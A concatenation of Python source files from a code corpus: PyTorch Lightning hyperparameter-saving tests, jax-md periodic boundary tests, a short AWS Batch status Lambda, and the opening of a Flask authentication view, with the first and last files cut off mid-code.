assert model.hparams.batch_size == 179
if isinstance(model, SubClassEvalModel):
assert model.hparams.subclass_arg == 1200
if isinstance(model, AggSubClassEvalModel):
assert isinstance(model.hparams.my_loss, torch.nn.CosineEmbeddingLoss)
# verify that the checkpoint saved the correct values
trainer = Trainer(default_root_dir=tmpdir, max_epochs=2, overfit_batches=0.5)
trainer.fit(model)
raw_checkpoint_path = _raw_checkpoint_path(trainer)
raw_checkpoint = torch.load(raw_checkpoint_path)
assert LightningModule.CHECKPOINT_HYPER_PARAMS_KEY in raw_checkpoint
assert raw_checkpoint[LightningModule.CHECKPOINT_HYPER_PARAMS_KEY]['batch_size'] == 179
# verify that model loads correctly
model = cls.load_from_checkpoint(raw_checkpoint_path)
assert model.hparams.batch_size == 179
if isinstance(model, AggSubClassEvalModel):
assert isinstance(model.hparams.my_loss, torch.nn.CosineEmbeddingLoss)
if isinstance(model, DictConfSubClassEvalModel):
assert isinstance(model.hparams.dict_conf, Container)
assert model.hparams.dict_conf['my_param'] == 'anything'
# verify that we can overwrite whatever we want
model = cls.load_from_checkpoint(raw_checkpoint_path, batch_size=99)
assert model.hparams.batch_size == 99
def _raw_checkpoint_path(trainer) -> str:
raw_checkpoint_paths = os.listdir(trainer.checkpoint_callback.dirpath)
raw_checkpoint_paths = [x for x in raw_checkpoint_paths if '.ckpt' in x]
assert raw_checkpoint_paths
raw_checkpoint_path = raw_checkpoint_paths[0]
raw_checkpoint_path = os.path.join(trainer.checkpoint_callback.dirpath, raw_checkpoint_path)
return raw_checkpoint_path
class LocalVariableModelSuperLast(EvalModelTemplate):
""" This model has the super().__init__() call at the end. """
def __init__(self, arg1, arg2, *args, **kwargs):
self.argument1 = arg1 # arg2 intentionally not set
arg1 = 'overwritten'
local_var = 1234
super().__init__(*args, **kwargs) # this is intentionally here at the end
class LocalVariableModelSuperFirst(EvalModelTemplate):
""" This model has the _auto_collect_arguments() call at the end. """
def __init__(self, arg1, arg2, *args, **kwargs):
super().__init__(*args, **kwargs)
self.argument1 = arg1 # arg2 intentionally not set
arg1 = 'overwritten'
local_var = 1234
self.save_hyperparameters() # this is intentionally here at the end
@pytest.mark.parametrize("cls", [
LocalVariableModelSuperFirst,
# LocalVariableModelSuperLast,
])
def test_collect_init_arguments_with_local_vars(cls):
""" Tests that only the arguments are collected and not local variables. """
model = cls(arg1=1, arg2=2)
assert 'local_var' not in model.hparams
assert model.hparams['arg1'] == 'overwritten'
assert model.hparams['arg2'] == 2
# @pytest.mark.parametrize("cls,config", [
# (SaveHparamsModel, Namespace(my_arg=42)),
# (SaveHparamsModel, dict(my_arg=42)),
# (SaveHparamsModel, OmegaConf.create(dict(my_arg=42))),
# (AssignHparamsModel, Namespace(my_arg=42)),
# (AssignHparamsModel, dict(my_arg=42)),
# (AssignHparamsModel, OmegaConf.create(dict(my_arg=42))),
# ])
# def test_single_config_models(tmpdir, cls, config):
# """ Test that the model automatically saves the arguments passed into the constructor """
# model = cls(config)
#
# # no matter how you do it, it should be assigned
# assert model.hparams.my_arg == 42
#
# # verify that the checkpoint saved the correct values
# trainer = Trainer(default_root_dir=tmpdir, max_epochs=2, overfit_batches=0.5)
# trainer.fit(model)
#
# # verify that model loads correctly
# raw_checkpoint_path = _raw_checkpoint_path(trainer)
# model = cls.load_from_checkpoint(raw_checkpoint_path)
# assert model.hparams.my_arg == 42
class AnotherArgModel(EvalModelTemplate):
def __init__(self, arg1):
super().__init__()
self.save_hyperparameters(arg1)
class OtherArgsModel(EvalModelTemplate):
def __init__(self, arg1, arg2):
super().__init__()
self.save_hyperparameters(arg1, arg2)
@pytest.mark.parametrize("cls,config", [
(AnotherArgModel, dict(arg1=42)),
(OtherArgsModel, dict(arg1=3.14, arg2='abc')),
])
def test_single_config_models_fail(tmpdir, cls, config):
""" Test fail on passing unsupported config type. """
with pytest.raises(ValueError):
_ = cls(**config)
@pytest.mark.parametrize("past_key", ['module_arguments'])
def test_load_past_checkpoint(tmpdir, past_key):
model = EvalModelTemplate()
# verify we can train
trainer = Trainer(default_root_dir=tmpdir, max_epochs=1)
trainer.fit(model)
# make sure the raw checkpoint saved the properties
raw_checkpoint_path = _raw_checkpoint_path(trainer)
raw_checkpoint = torch.load(raw_checkpoint_path)
raw_checkpoint[past_key] = raw_checkpoint[LightningModule.CHECKPOINT_HYPER_PARAMS_KEY]
raw_checkpoint['hparams_type'] = 'Namespace'
raw_checkpoint[past_key]['batch_size'] = -17
del raw_checkpoint[LightningModule.CHECKPOINT_HYPER_PARAMS_KEY]
# save back the checkpoint
torch.save(raw_checkpoint, raw_checkpoint_path)
# verify that model loads correctly
model2 = EvalModelTemplate.load_from_checkpoint(raw_checkpoint_path)
assert model2.hparams.batch_size == -17
def test_hparams_pickle(tmpdir):
ad = AttributeDict({'key1': 1, 'key2': 'abc'})
pkl = pickle.dumps(ad)
assert ad == pickle.loads(pkl)
pkl = cloudpickle.dumps(ad)
assert ad == pickle.loads(pkl)
class UnpickleableArgsEvalModel(EvalModelTemplate):
""" A model that has an attribute that cannot be pickled. """
def __init__(self, foo='bar', pickle_me=(lambda x: x + 1), **kwargs):
super().__init__(**kwargs)
assert not is_picklable(pickle_me)
self.save_hyperparameters()
def test_hparams_pickle_warning(tmpdir):
model = UnpickleableArgsEvalModel()
trainer = Trainer(default_root_dir=tmpdir, max_steps=1)
with pytest.warns(UserWarning, match="attribute 'pickle_me' removed from hparams because it cannot be pickled"):
trainer.fit(model)
assert 'pickle_me' not in model.hparams
def test_hparams_save_yaml(tmpdir):
hparams = dict(batch_size=32, learning_rate=0.001, data_root='./any/path/here',
nasted=dict(any_num=123, anystr='abcd'))
path_yaml = os.path.join(tmpdir, 'testing-hparams.yaml')
save_hparams_to_yaml(path_yaml, hparams)
assert load_hparams_from_yaml(path_yaml) == hparams
save_hparams_to_yaml(path_yaml, Namespace(**hparams))
assert load_hparams_from_yaml(path_yaml) == hparams
save_hparams_to_yaml(path_yaml, AttributeDict(hparams))
assert load_hparams_from_yaml(path_yaml) == hparams
save_hparams_to_yaml(path_yaml, OmegaConf.create(hparams))
assert load_hparams_from_yaml(path_yaml) == hparams
class NoArgsSubClassEvalModel(EvalModelTemplate):
def __init__(self):
super().__init__()
class SimpleNoArgsModel(LightningModule):
def __init__(self):
super().__init__()
self.l1 = torch.nn.Linear(28 * 28, 10)
def forward(self, x):
return torch.relu(self.l1(x.view(x.size(0), -1)))
def training_step(self, batch, batch_nb):
x, y = batch
loss = F.cross_entropy(self(x), y)
return {'loss': loss, 'log': {'train_loss': loss}}
def test_step(self, batch, batch_nb):
x, y = batch
loss = F.cross_entropy(self(x), y)
return {'loss': loss, 'log': {'train_loss': loss}}
def configure_optimizers(self):
return torch.optim.Adam(self.parameters(), lr=0.02)
@pytest.mark.parametrize("cls", [
SimpleNoArgsModel,
NoArgsSubClassEvalModel,
])
def test_model_nohparams_train_test(tmpdir, cls):
"""Test models that do not tae any argument in init."""
model = cls()
trainer = Trainer(
max_epochs=1,
default_root_dir=tmpdir,
)
train_loader = DataLoader(TrialMNIST(os.getcwd(), train=True, download=True), batch_size=32)
trainer.fit(model, train_loader)
test_loader = DataLoader(TrialMNIST(os.getcwd(), train=False, download=True), batch_size=32)
trainer.test(test_dataloaders=test_loader)
def test_model_ignores_non_exist_kwargument(tmpdir):
"""Test that the model takes only valid class arguments."""
class LocalModel(EvalModelTemplate):
def __init__(self, batch_size=15):
super().__init__(batch_size=batch_size)
self.save_hyperparameters()
model = LocalModel()
assert model.hparams.batch_size == 15
# verify that the checkpoint saved the correct values
trainer = Trainer(default_root_dir=tmpdir, max_epochs=1)
trainer.fit(model)
# verify that we can overwrite whatever we want
raw_checkpoint_path = _raw_checkpoint_path(trainer)
model = LocalModel.load_from_checkpoint(raw_checkpoint_path, non_exist_kwarg=99)
assert 'non_exist_kwarg' not in model.hparams
class SuperClassPositionalArgs(EvalModelTemplate):
def __init__(self, hparams):
super().__init__()
self._hparams = None # pretend EvalModelTemplate did not call self.save_hyperparameters()
self.hparams = hparams
class SubClassVarArgs(SuperClassPositionalArgs):
""" Loading this model should accept hparams and init in the super class """
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
def test_args(tmpdir):
""" Test for inheritance: super class takes positional arg, subclass takes varargs. """
hparams = dict(test=1)
model = SubClassVarArgs(hparams)
trainer = Trainer(default_root_dir=tmpdir, max_epochs=1)
trainer.fit(model)
raw_checkpoint_path = _raw_checkpoint_path(trainer)
    with pytest.raises(TypeError, match=r"__init__\(\) got an unexpected keyword argument 'test'"):
SubClassVarArgs.load_from_checkpoint(raw_checkpoint_path)
class RuntimeParamChangeModelSaving(BoringModel):
def __init__(self, **kwargs):
super().__init__()
self.save_hyperparameters()
class RuntimeParamChangeModelAssign(BoringModel):
def __init__(self, **kwargs):
super().__init__()
self.hparams = kwargs
@pytest.mark.parametrize("cls", [RuntimeParamChangeModelSaving, RuntimeParamChangeModelAssign])
def test_init_arg_with_runtime_change(tmpdir, cls):
"""Test that we save/export only the initial hparams, no other runtime change allowed"""
model = cls(running_arg=123)
assert model.hparams.running_arg == 123
model.hparams.running_arg = -1
assert model.hparams.running_arg == -1
model.hparams = Namespace(abc=42)
assert model.hparams.abc == 42
trainer = Trainer(
default_root_dir=tmpdir,
limit_train_batches=2,
limit_val_batches=2,
limit_test_batches=2,
max_epochs=1,
)
trainer.fit(model)
path_yaml = os.path.join(trainer.logger.log_dir, trainer.logger.NAME_HPARAMS_FILE)
hparams = load_hparams_from_yaml(path_yaml)
assert hparams.get('running_arg') == 123
class UnsafeParamModel(BoringModel):
def __init__(self, my_path, any_param=123):
super().__init__()
self.save_hyperparameters()
def test_model_with_fsspec_as_parameter(tmpdir):
model = UnsafeParamModel(LocalFileSystem(tmpdir))
trainer = Trainer(
default_root_dir=tmpdir,
limit_train_batches=2,
limit_val_batches=2,
limit_test_batches=2,
max_epochs=1,
)
trainer.fit(model)
trainer.test()
| 2.046875 | 2 |
tests/space_test.py | hadrianmontes/jax-md | 713 | 1267 | <reponame>hadrianmontes/jax-md<gh_stars>100-1000
# Copyright 2019 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Tests for jax_md.space."""
from absl.testing import absltest
from absl.testing import parameterized
from jax.config import config as jax_config
from jax import random
import jax.numpy as jnp
from jax import grad, jit, jacfwd
from jax import test_util as jtu
from jax_md import space, test_util, quantity, energy
from jax_md.util import *
from functools import partial
from unittest import SkipTest
test_util.update_test_tolerance(5e-5, 5e-13)
jax_config.parse_flags_with_absl()
jax_config.enable_omnistaging()
FLAGS = jax_config.FLAGS
PARTICLE_COUNT = 10
STOCHASTIC_SAMPLES = 10
SHIFT_STEPS = 10
SPATIAL_DIMENSION = [2, 3]
BOX_FORMATS = ['scalar', 'vector', 'matrix']
if FLAGS.jax_enable_x64:
POSITION_DTYPE = [f32, f64]
else:
POSITION_DTYPE = [f32]
def make_periodic_general_test_system(N, dim, dtype, box_format):
assert box_format in BOX_FORMATS
box_size = quantity.box_size_at_number_density(N, 1.0, dim)
box = dtype(box_size)
if box_format == 'vector':
box = jnp.array(jnp.ones(dim) * box_size, dtype)
elif box_format == 'matrix':
box = jnp.array(jnp.eye(dim) * box_size, dtype)
d, s = space.periodic(jnp.diag(box) if box_format == 'matrix' else box)
d_gf, s_gf = space.periodic_general(box)
d_g, s_g = space.periodic_general(box, fractional_coordinates=False)
key = random.PRNGKey(0)
R_f = random.uniform(key, (N, dim), dtype=dtype)
R = space.transform(box, R_f)
E = jit(energy.soft_sphere_pair(d))
E_gf = jit(energy.soft_sphere_pair(d_gf))
E_g = jit(energy.soft_sphere_pair(d_g))
return R_f, R, box, (s, E), (s_gf, E_gf), (s_g, E_g)
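# Added commentary (not part of the original test file): the helper above builds the
# same soft-sphere system under three space descriptions -- `space.periodic` acting on
# real coordinates R, `space.periodic_general` acting on fractional coordinates R_f,
# and `space.periodic_general(..., fractional_coordinates=False)` acting on R -- so the
# tests below can check that energies, forces and shifts agree across all three.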
# pylint: disable=invalid-name
class SpaceTest(jtu.JaxTestCase):
# pylint: disable=g-complex-comprehension
@parameterized.named_parameters(jtu.cases_from_list(
{
'testcase_name': '_dim={}_dtype={}'.format(dim, dtype.__name__),
'spatial_dimension': dim,
'dtype': dtype
} for dim in SPATIAL_DIMENSION for dtype in POSITION_DTYPE))
def test_transform(self, spatial_dimension, dtype):
key = random.PRNGKey(0)
for _ in range(STOCHASTIC_SAMPLES):
key, split1, split2 = random.split(key, 3)
R = random.normal(
split1, (PARTICLE_COUNT, spatial_dimension), dtype=dtype)
T = random.normal(
split2, (spatial_dimension, spatial_dimension), dtype=dtype)
R_prime_exact = jnp.array(jnp.einsum('ij,kj->ki', T, R), dtype=dtype)
R_prime = space.transform(T, R)
self.assertAllClose(R_prime_exact, R_prime)
@parameterized.named_parameters(jtu.cases_from_list(
{
'testcase_name': '_dim={}'.format(dim),
'spatial_dimension': dim
} for dim in SPATIAL_DIMENSION))
def test_transform_grad(self, spatial_dimension):
key = random.PRNGKey(0)
for _ in range(STOCHASTIC_SAMPLES):
key, split1, split2 = random.split(key, 3)
R = random.normal(split1, (PARTICLE_COUNT, spatial_dimension))
T = random.normal(split2, (spatial_dimension, spatial_dimension))
R_prime = space.transform(T, R)
energy_direct = lambda R: jnp.sum(R ** 2)
energy_indirect = lambda T, R: jnp.sum(space.transform(T, R) ** 2)
grad_direct = grad(energy_direct)(R_prime)
grad_indirect = grad(energy_indirect, 1)(T, R)
self.assertAllClose(grad_direct, grad_indirect)
@parameterized.named_parameters(jtu.cases_from_list(
{
'testcase_name': '_dim={}_dtype={}'.format(dim, dtype.__name__),
'spatial_dimension': dim,
'dtype': dtype
} for dim in SPATIAL_DIMENSION for dtype in POSITION_DTYPE))
def test_transform_inverse(self, spatial_dimension, dtype):
key = random.PRNGKey(0)
tol = 1e-13
if dtype is f32:
tol = 1e-5
for _ in range(STOCHASTIC_SAMPLES):
key, split1, split2 = random.split(key, 3)
R = random.normal(
split1, (PARTICLE_COUNT, spatial_dimension), dtype=dtype)
T = random.normal(
split2, (spatial_dimension, spatial_dimension), dtype=dtype)
T_inv = space.inverse(T)
R_test = space.transform(T_inv, space.transform(T, R))
self.assertAllClose(R, R_test)
@parameterized.named_parameters(jtu.cases_from_list(
{
'testcase_name': '_dim={}_dtype={}'.format(dim, dtype.__name__),
'spatial_dimension': dim,
'dtype': dtype
} for dim in SPATIAL_DIMENSION for dtype in POSITION_DTYPE))
def test_canonicalize_displacement_or_metric(self, spatial_dimension, dtype):
key = random.PRNGKey(0)
displacement, _ = space.periodic_general(jnp.eye(spatial_dimension))
metric = space.metric(displacement)
test_metric = space.canonicalize_displacement_or_metric(displacement)
metric = space.map_product(metric)
test_metric = space.map_product(test_metric)
for _ in range(STOCHASTIC_SAMPLES):
key, split1, split2 = random.split(key, 3)
R = random.normal(
split1, (PARTICLE_COUNT, spatial_dimension), dtype=dtype)
self.assertAllClose(metric(R, R), test_metric(R, R))
@parameterized.named_parameters(jtu.cases_from_list(
{
'testcase_name': '_dim={}_dtype={}'.format(dim, dtype.__name__),
'spatial_dimension': dim,
'dtype': dtype
} for dim in SPATIAL_DIMENSION for dtype in POSITION_DTYPE))
def test_periodic_displacement(self, spatial_dimension, dtype):
key = random.PRNGKey(0)
for _ in range(STOCHASTIC_SAMPLES):
key, split = random.split(key)
R = random.uniform(
split, (PARTICLE_COUNT, spatial_dimension), dtype=dtype)
dR = space.map_product(space.pairwise_displacement)(R, R)
dR_wrapped = space.periodic_displacement(f32(1.0), dR)
dR_direct = dR
dr_direct = space.distance(dR)
dr_direct = jnp.reshape(dr_direct, dr_direct.shape + (1,))
if spatial_dimension == 2:
for i in range(-1, 2):
for j in range(-1, 2):
dR_shifted = dR + jnp.array([i, j], dtype=R.dtype)
dr_shifted = space.distance(dR_shifted)
dr_shifted = jnp.reshape(dr_shifted, dr_shifted.shape + (1,))
dR_direct = jnp.where(dr_shifted < dr_direct, dR_shifted, dR_direct)
dr_direct = jnp.where(dr_shifted < dr_direct, dr_shifted, dr_direct)
elif spatial_dimension == 3:
for i in range(-1, 2):
for j in range(-1, 2):
for k in range(-1, 2):
dR_shifted = dR + jnp.array([i, j, k], dtype=R.dtype)
dr_shifted = space.distance(dR_shifted)
dr_shifted = jnp.reshape(dr_shifted, dr_shifted.shape + (1,))
dR_direct = jnp.where(
dr_shifted < dr_direct, dR_shifted, dR_direct)
dr_direct = jnp.where(
dr_shifted < dr_direct, dr_shifted, dr_direct)
dR_direct = jnp.array(dR_direct, dtype=dR.dtype)
assert dR_wrapped.dtype == dtype
self.assertAllClose(dR_wrapped, dR_direct)
@parameterized.named_parameters(jtu.cases_from_list(
{
'testcase_name': '_dim={}_dtype={}'.format(dim, dtype.__name__),
'spatial_dimension': dim,
'dtype': dtype
} for dim in SPATIAL_DIMENSION for dtype in POSITION_DTYPE))
def test_periodic_shift(self, spatial_dimension, dtype):
key = random.PRNGKey(0)
for _ in range(STOCHASTIC_SAMPLES):
key, split1, split2 = random.split(key, 3)
R = random.uniform(
split1, (PARTICLE_COUNT, spatial_dimension), dtype=dtype)
dR = jnp.sqrt(f32(0.1)) * random.normal(
split2, (PARTICLE_COUNT, spatial_dimension), dtype=dtype)
dR = jnp.where(dR > 0.49, f32(0.49), dR)
dR = jnp.where(dR < -0.49, f32(-0.49), dR)
R_shift = space.periodic_shift(f32(1.0), R, dR)
assert R_shift.dtype == R.dtype
assert jnp.all(R_shift < 1.0)
assert jnp.all(R_shift > 0.0)
dR_after = space.periodic_displacement(f32(1.0), R_shift - R)
assert dR_after.dtype == R.dtype
self.assertAllClose(dR_after, dR)
@parameterized.named_parameters(jtu.cases_from_list(
{
'testcase_name': '_dim={}_dtype={}'.format(dim, dtype.__name__),
'spatial_dimension': dim,
'dtype': dtype
} for dim in SPATIAL_DIMENSION for dtype in POSITION_DTYPE))
def test_periodic_against_periodic_general(self, spatial_dimension, dtype):
key = random.PRNGKey(0)
tol = 1e-13
if dtype is f32:
tol = 1e-5
for _ in range(STOCHASTIC_SAMPLES):
key, split1, split2, split3 = random.split(key, 4)
max_box_size = f32(10.0)
box_size = max_box_size * random.uniform(
split1, (spatial_dimension,), dtype=dtype)
transform = jnp.diag(box_size)
R = random.uniform(
split2, (PARTICLE_COUNT, spatial_dimension), dtype=dtype)
R_scaled = R * box_size
dR = random.normal(
split3, (PARTICLE_COUNT, spatial_dimension), dtype=dtype)
disp_fn, shift_fn = space.periodic(box_size)
general_disp_fn, general_shift_fn = space.periodic_general(transform)
disp_fn = space.map_product(disp_fn)
general_disp_fn = space.map_product(general_disp_fn)
self.assertAllClose(disp_fn(R_scaled, R_scaled), general_disp_fn(R, R))
assert disp_fn(R_scaled, R_scaled).dtype == dtype
self.assertAllClose(
shift_fn(R_scaled, dR), general_shift_fn(R, dR) * box_size)
assert shift_fn(R_scaled, dR).dtype == dtype
@parameterized.named_parameters(jtu.cases_from_list(
{
'testcase_name': '_dim={}_dtype={}'.format(dim, dtype.__name__),
'spatial_dimension': dim,
'dtype': dtype
} for dim in SPATIAL_DIMENSION for dtype in POSITION_DTYPE))
def test_periodic_against_periodic_general_grad(self, spatial_dimension, dtype):
key = random.PRNGKey(0)
tol = 1e-13
if dtype is f32:
tol = 1e-5
for _ in range(STOCHASTIC_SAMPLES):
key, split1, split2, split3 = random.split(key, 4)
max_box_size = f32(10.0)
box_size = max_box_size * random.uniform(
split1, (spatial_dimension,), dtype=dtype)
transform = jnp.diag(box_size)
R = random.uniform(
split2, (PARTICLE_COUNT, spatial_dimension), dtype=dtype)
R_scaled = R * box_size
dR = random.normal(
split3, (PARTICLE_COUNT, spatial_dimension), dtype=dtype)
disp_fn, shift_fn = space.periodic(box_size)
general_disp_fn, general_shift_fn = space.periodic_general(transform)
disp_fn = space.map_product(disp_fn)
general_disp_fn = space.map_product(general_disp_fn)
grad_fn = grad(lambda R: jnp.sum(disp_fn(R, R) ** 2))
general_grad_fn = grad(lambda R: jnp.sum(general_disp_fn(R, R) ** 2))
self.assertAllClose(grad_fn(R_scaled), general_grad_fn(R))
assert general_grad_fn(R).dtype == dtype
@parameterized.named_parameters(jtu.cases_from_list(
{
'testcase_name': '_dim={}_dtype={}'.format(dim, dtype.__name__),
'spatial_dimension': dim,
'dtype': dtype,
} for dim in SPATIAL_DIMENSION for dtype in POSITION_DTYPE))
def test_periodic_general_dynamic(self, spatial_dimension, dtype):
key = random.PRNGKey(0)
eye = jnp.eye(spatial_dimension)
for _ in range(STOCHASTIC_SAMPLES):
key, split_T0_scale, split_T0_dT = random.split(key, 3)
key, split_T1_scale, split_T1_dT = random.split(key, 3)
key, split_t, split_R, split_dR = random.split(key, 4)
size_0 = 10.0 * random.uniform(split_T0_scale, ())
dtransform_0 = 0.5 * random.normal(
split_T0_dT, (spatial_dimension, spatial_dimension))
T_0 = jnp.array(size_0 * (eye + dtransform_0), dtype=dtype)
size_1 = 10.0 * random.uniform(split_T1_scale, (), dtype=dtype)
dtransform_1 = 0.5 * random.normal(
split_T1_dT, (spatial_dimension, spatial_dimension), dtype=dtype)
T_1 = jnp.array(size_1 * (eye + dtransform_1), dtype=dtype)
disp_fn, shift_fn = space.periodic_general(T_0)
true_disp_fn, true_shift_fn = space.periodic_general(T_1)
disp_fn = partial(disp_fn, box=T_1)
disp_fn = space.map_product(disp_fn)
true_disp_fn = space.map_product(true_disp_fn)
R = random.uniform(
split_R, (PARTICLE_COUNT, spatial_dimension), dtype=dtype)
dR = random.normal(
split_dR, (PARTICLE_COUNT, spatial_dimension), dtype=dtype)
self.assertAllClose(
disp_fn(R, R), jnp.array(true_disp_fn(R, R), dtype=dtype))
self.assertAllClose(
shift_fn(R, dR, box=T_1), jnp.array(true_shift_fn(R, dR), dtype=dtype))
@parameterized.named_parameters(jtu.cases_from_list(
{
'testcase_name': '_dim={}_dtype={}'.format(dim, dtype.__name__),
'spatial_dimension': dim,
'dtype': dtype,
} for dim in SPATIAL_DIMENSION for dtype in POSITION_DTYPE))
def test_periodic_general_wrapped_vs_unwrapped(
self, spatial_dimension, dtype):
key = random.PRNGKey(0)
eye = jnp.eye(spatial_dimension, dtype=dtype)
tol = 1e-13
if dtype is f32:
tol = 2e-5
for _ in range(STOCHASTIC_SAMPLES):
key, split_R, split_T = random.split(key, 3)
dT = random.normal(
split_T, (spatial_dimension, spatial_dimension), dtype=dtype)
T = eye + dT + jnp.transpose(dT)
R = random.uniform(
split_R, (PARTICLE_COUNT, spatial_dimension), dtype=dtype)
R0 = R
unwrapped_R = R
displacement, shift = space.periodic_general(T)
_, unwrapped_shift = space.periodic_general(T, wrapped=False)
displacement = space.map_product(displacement)
for _ in range(SHIFT_STEPS):
key, split = random.split(key)
dR = random.normal(
split, (PARTICLE_COUNT, spatial_dimension), dtype=dtype)
R = shift(R, dR)
unwrapped_R = unwrapped_shift(unwrapped_R, dR)
self.assertAllClose(
displacement(R, R0),
displacement(unwrapped_R, R0))
assert not (jnp.all(unwrapped_R > 0) and jnp.all(unwrapped_R < 1))
@parameterized.named_parameters(jtu.cases_from_list(
{
'testcase_name': f'_dim={dim}_dtype={dtype.__name__}_box_format={box_format}',
'spatial_dimension': dim,
'dtype': dtype,
'box_format': box_format
} for dim in SPATIAL_DIMENSION
for dtype in POSITION_DTYPE
for box_format in BOX_FORMATS))
def test_periodic_general_energy(self, spatial_dimension, dtype, box_format):
N = 16
R_f, R, box, (s, E), (s_gf, E_gf), (s_g, E_g) = \
make_periodic_general_test_system(N, spatial_dimension, dtype, box_format)
self.assertAllClose(E(R), E_gf(R_f))
self.assertAllClose(E(R), E_g(R))
@parameterized.named_parameters(jtu.cases_from_list(
{
'testcase_name': f'_dim={dim}_dtype={dtype.__name__}_box_format={box_format}',
'spatial_dimension': dim,
'dtype': dtype,
'box_format': box_format
} for dim in SPATIAL_DIMENSION
for dtype in POSITION_DTYPE
for box_format in BOX_FORMATS))
def test_periodic_general_force(self, spatial_dimension, dtype, box_format):
N = 16
R_f, R, box, (s, E), (s_gf, E_gf), (s_g, E_g) = \
make_periodic_general_test_system(N, spatial_dimension, dtype, box_format)
self.assertAllClose(grad(E)(R), grad(E_gf)(R_f))
self.assertAllClose(grad(E)(R), grad(E_g)(R))
@parameterized.named_parameters(jtu.cases_from_list(
{
'testcase_name': f'_dim={dim}_dtype={dtype.__name__}_box_format={box_format}',
'spatial_dimension': dim,
'dtype': dtype,
'box_format': box_format
} for dim in SPATIAL_DIMENSION
for dtype in POSITION_DTYPE
for box_format in BOX_FORMATS))
def test_periodic_general_shift(self, spatial_dimension, dtype, box_format):
N = 16
R_f, R, box, (s, E), (s_gf, E_gf), (s_g, E_g) = \
make_periodic_general_test_system(N, spatial_dimension, dtype, box_format)
R_new = s(R, grad(E)(R))
R_gf_new = s_gf(R_f, grad(E_gf)(R_f))
R_g_new = s_g(R, grad(E_g)(R))
self.assertAllClose(R_new, space.transform(box, R_gf_new))
self.assertAllClose(R_new, R_g_new)
@parameterized.named_parameters(jtu.cases_from_list(
{
'testcase_name': f'_dim={dim}_dtype={dtype.__name__}_box_format={box_format}',
'spatial_dimension': dim,
'dtype': dtype,
'box_format': box_format
} for dim in SPATIAL_DIMENSION
for dtype in POSITION_DTYPE
for box_format in BOX_FORMATS))
def test_periodic_general_deform(self, spatial_dimension, dtype, box_format):
N = 16
R_f, R, box, (s, E), (s_gf, E_gf), (s_g, E_g) = \
make_periodic_general_test_system(N, spatial_dimension, dtype, box_format)
deformed_box = box * 0.9
self.assertAllClose(E_gf(R_f, box=deformed_box),
E_g(R, new_box=deformed_box))
@parameterized.named_parameters(jtu.cases_from_list(
{
'testcase_name': f'_dim={dim}_dtype={dtype.__name__}_box_format={box_format}',
'spatial_dimension': dim,
'dtype': dtype,
'box_format': box_format
} for dim in SPATIAL_DIMENSION
for dtype in POSITION_DTYPE
for box_format in BOX_FORMATS))
def test_periodic_general_deform_grad(self,
spatial_dimension, dtype, box_format):
N = 16
R_f, R, box, (s, E), (s_gf, E_gf), (s_g, E_g) = \
make_periodic_general_test_system(N, spatial_dimension, dtype, box_format)
deformed_box = box * 0.9
self.assertAllClose(grad(E_gf)(R_f, box=deformed_box),
grad(E_g)(R, new_box=deformed_box))
self.assertAllClose(jacfwd(E_gf)(R_f, box=deformed_box),
jacfwd(E_g)(R, new_box=deformed_box))
@parameterized.named_parameters(jtu.cases_from_list(
{
'testcase_name': f'_dim={dim}_dtype={dtype.__name__}_box_format={box_format}',
'spatial_dimension': dim,
'dtype': dtype,
'box_format': box_format
} for dim in SPATIAL_DIMENSION
for dtype in POSITION_DTYPE
for box_format in BOX_FORMATS))
def test_periodic_general_deform_shift(self,
spatial_dimension, dtype, box_format):
N = 16
R_f, R, box, (s, E), (s_gf, E_gf), (s_g, E_g) = \
make_periodic_general_test_system(N, spatial_dimension, dtype, box_format)
deformed_box = box * 0.9
R_new = s_g(R, grad(E_g)(R), new_box=deformed_box)
R_gf_new = space.transform(deformed_box, s_gf(R_f, grad(E_gf)(R_f)))
self.assertAllClose(R_new, R_gf_new)
@parameterized.named_parameters(jtu.cases_from_list(
{
'testcase_name': f'_dim={dim}_dtype={dtype.__name__}_box_format={box_format}',
'spatial_dimension': dim,
'dtype': dtype,
'box_format': box_format
} for dim in SPATIAL_DIMENSION
for dtype in POSITION_DTYPE
for box_format in BOX_FORMATS))
def test_periodic_general_grad_box(self, spatial_dimension, dtype, box_format):
if box_format == 'scalar':
raise SkipTest('Scalar case fails due to JAX Issue #5849.')
N = 16
R_f, R, box, (s, E), (s_gf, E_gf), (s_g, E_g) = \
make_periodic_general_test_system(N, spatial_dimension, dtype, box_format)
@grad
def box_energy_g_fn(box):
return E_g(R, new_box=box)
@grad
def box_energy_gf_fn(box):
return E_gf(R_f, box=box)
self.assertAllClose(box_energy_g_fn(box), box_energy_gf_fn(box))
if __name__ == '__main__':
absltest.main()
| 1.898438 | 2 |
functions/batch-custom-action/status-api/lambda.py | TrollPursePublishing/trollpurse-trollops | 2 | 1268 | <filename>functions/batch-custom-action/status-api/lambda.py
import boto3
batch_client = boto3.client('batch')
def lambda_handler(event, context):
describe_response = batch_client.describe_jobs(
jobs=[ event.get('jobId', '')]
)
return describe_response.get('jobs', [{}])[0].get('status', '')
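# Minimal local invocation sketch (added; the job id below is made up, and real AWS
# credentials plus an existing Batch job would be required for this call to succeed).
if __name__ == '__main__':
    print(lambda_handler({'jobId': 'example-job-id'}, None))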
| 2.09375 | 2 |
app/auth/views.py | ifaraag/app | 0 | 1269 | <reponame>ifaraag/app<filename>app/auth/views.py<gh_stars>0
from flask import Blueprint, render_template, redirect, url_for, request, flash
from flask_login import login_required, login_user, logout_user
from werkzeug.security import check_password_hash, generate_password_hash
from app import db, login_manager, pubnub, app, _callback
from .models import User
from .forms import LoginForm, SignupForm
mod_auth = Blueprint('auth', __name__)
@mod_auth.route('/login', methods=['GET', 'POST'])
def login():
form = LoginForm(request.form)
error = None
print(request.method)
if request.method == 'POST':
user = db.users.find_one({'username': request.form['username']})
if not user:
error = 'User does not exist'
elif not check_password_hash(user['password'], request.form['password']):
error = 'Invalid credentials. Please try again.'
else:
user_obj = User(user['username'])
login_user(user_obj)
return redirect(url_for('devices.list_devices'))
return render_template('auth/login.html',
title='Log In to Hydrosmart',
form=form,
error=error)
@mod_auth.route('/signup', methods=['GET', 'POST'])
def signup():
form = SignupForm(request.form)
error = None
if request.method == 'POST':
